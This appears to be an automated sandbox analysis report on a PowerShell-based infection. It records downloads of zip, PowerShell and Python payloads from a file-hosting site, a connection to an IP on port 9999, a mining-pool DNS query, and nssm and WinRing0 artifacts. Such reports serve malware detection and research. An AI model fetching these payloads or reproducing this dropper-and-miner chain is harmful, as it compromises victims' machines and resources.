                    Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680EA3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2045796761.00000236FDA12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2039838656.00000236FBB50000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\mscorlib.pdbe,"U source: powershell.exe, 0000000F.00000002.2373129297.000001B6503B1000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.2048314360.00000236FDD2E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2369713930.000001B64FED4000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.2039838656.00000236FBB50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2373129297.000001B65036C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2378326274.000001B6503C7000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: _hashlib.pyd.9.dr
                    Source: Binary string: n.pdb source: powershell.exe, 00000009.00000002.2046798962.00000236FDA44000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: _queue.pyd.9.dr
                    Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: powershell.exe, 0000000F.00000002.2170524020.000001B63827B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2170524020.000001B638064000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb16 source: powershell.exe, 00000009.00000002.2048314360.00000236FDD2E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\winsound.pdb source: powershell.exe, 00000009.00000002.1946719482.0000023680FE0000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: global trafficTCP traffic: 192.168.2.7:49884 -> 51.89.217.80:9999
                    Source: Joe Sandbox ViewIP Address: 51.89.217.80 51.89.217.80
                    Source: Joe Sandbox ViewIP Address: 108.181.20.35 108.181.20.35
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49831 -> 108.181.20.35:443
                    Source: global trafficHTTP traffic detected: GET /d6pvcr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /ei5hyq.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1qm51s.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /gw2gji.py HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moe
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /d6pvcr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /ei5hyq.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1qm51s.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /gw2gji.py HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moe
                    Source: global trafficDNS traffic detected: DNS query: time.windows.com
                    Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
                    Source: global trafficDNS traffic detected: DNS query: xmrpool.eu
                    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Fri, 06 Dec 2024 09:26:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeContent-Security-Policy: default-src 'self'; img-src 'self' https://quickchart.io https://files.catbox.moe; media-src 'self' https://files.catbox.moe; style-src 'self' 'unsafe-inline'; script-src https://www.google.com https://www.gstatic.com 'self' 'unsafe-inline'; frame-src https://www.google.com;
                    Source: logging.py.9.drString found in binary or memory: http://127.0.0.1:8080
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236819C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue16298)
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236816AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue28539
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp, _hashlib.pyd.9.dr, _queue.pyd.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp, _hashlib.pyd.9.dr, _queue.pyd.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp, _hashlib.pyd.9.dr, _queue.pyd.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp, _hashlib.pyd.9.dr, _queue.pyd.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: powershell.exe, 0000000F.00000002.2170524020.000001B63827B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2170524020.000001B638064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                    Source: powershell.exe, 0000000F.00000002.2170524020.000001B63827B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2170524020.000001B638064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                    Source: powershell.exe, 0000000F.00000002.2170524020.000001B63827B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2170524020.000001B638064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                    Source: powershell.exe, 0000000F.00000002.2170524020.000001B63827B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2170524020.000001B638064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                    Source: powershell.exe, 0000000C.00000002.1358799349.0000026332785000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp, _hashlib.pyd.9.dr, _queue.pyd.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp, _hashlib.pyd.9.dr, _queue.pyd.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp, _hashlib.pyd.9.dr, _queue.pyd.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: _queue.pyd.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp, _hashlib.pyd.9.dr, _queue.pyd.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681C89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/license.html
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681003000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E81607000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://files.catbox.moe
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236816AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681513000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                    Source: url.cpython-312.pyc.9.drString found in binary or memory: http://google.com/mail/
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hdl.handle.net/1895.22/1013
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681CBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681B2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681CC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236816AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l252
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://httpbin.org/robots.txt
                    Source: nssm.exeString found in binary or memory: http://nssm.cc/
                    Source: powershell.exe, 0000000F.00000002.2170524020.000001B6382B4000.00000004.00000800.00020000.00000000.sdmp, nssm.exe, 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmp, nssm.exe, 00000014.00000002.2125459465.000000014002D000.00000002.00000001.01000000.00000008.sdmp, nssm.exe, 00000015.00000000.2125818922.000000014002D000.00000002.00000001.01000000.00000008.sdmp, nssm.exe, 00000016.00000000.2127145480.000000014002D000.00000002.00000001.01000000.00000008.sdmp, nssm.exe, 00000017.00000000.2127587556.000000014002D000.00000002.00000001.01000000.00000008.sdmp, nssm.exe, 0000001A.00000000.2157392204.000000014002D000.00000002.00000001.01000000.00000008.sdmp, nssm.exe, 0000001B.00000002.2160132867.000000014002D000.00000002.00000001.01000000.00000008.sdmp, nssm.exe, 0000001C.00000002.2161563469.000000014002D000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://nssm.cc/h
                    Source: powershell.exe, 00000004.00000002.1327060198.000001DCE3BB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1301594968.000001DCD53CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1327060198.000001DCE3A7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2030791717.00000236901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2030791717.0000023690070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1423292874.00000263443E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1360597660.0000026335B06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1423292874.00000263442AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E819FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2592051177.0000025E90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2592051177.0000025E901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2351984899.000001B647AFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2351984899.000001B647C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp, _hashlib.pyd.9.dr, _queue.pyd.9.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp, _hashlib.pyd.9.dr, _queue.pyd.9.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp, _hashlib.pyd.9.dr, _queue.pyd.9.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp, _hashlib.pyd.9.dr, _queue.pyd.9.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: powershell.exe, 0000000F.00000002.2170524020.000001B637D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000004.00000002.1301594968.000001DCD3A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1360597660.0000026334231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2170524020.000001B637A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc3986#section-5.2.4
                    Source: KDF.py.9.drString found in binary or memory: http://tools.ietf.org/html/rfc5297
                    Source: KDF.py.9.drString found in binary or memory: http://tools.ietf.org/html/rfc5869
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681C89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681AEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681AF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C7C000.00000004.00000800.00020000.00000000.sdmp, ssl_match_hostname.cpython-312.pyc.9.drString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                    Source: powershell.exe, 00000004.00000002.1301594968.000001DCD4E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1360597660.00000263356B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: powershell.exe, 0000000F.00000002.2170524020.000001B637D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: svchost.exe, 00000000.00000002.1371884778.000002728C213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236807AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp, _hashlib.pyd.9.dr, _queue.pyd.9.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pythonlabs.com/logos.html
                    Source: powershell.exe, 0000000F.00000002.2373129297.000001B6502B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t.com/pk
                    Source: KDF.py.9.drString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
                    Source: powershell.exe, 00000004.00000002.1301594968.000001DCD3A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1360597660.0000026334231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2170524020.000001B637A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.securityscorecards.dev/projects/github.com/urllib3/urllib3/badge
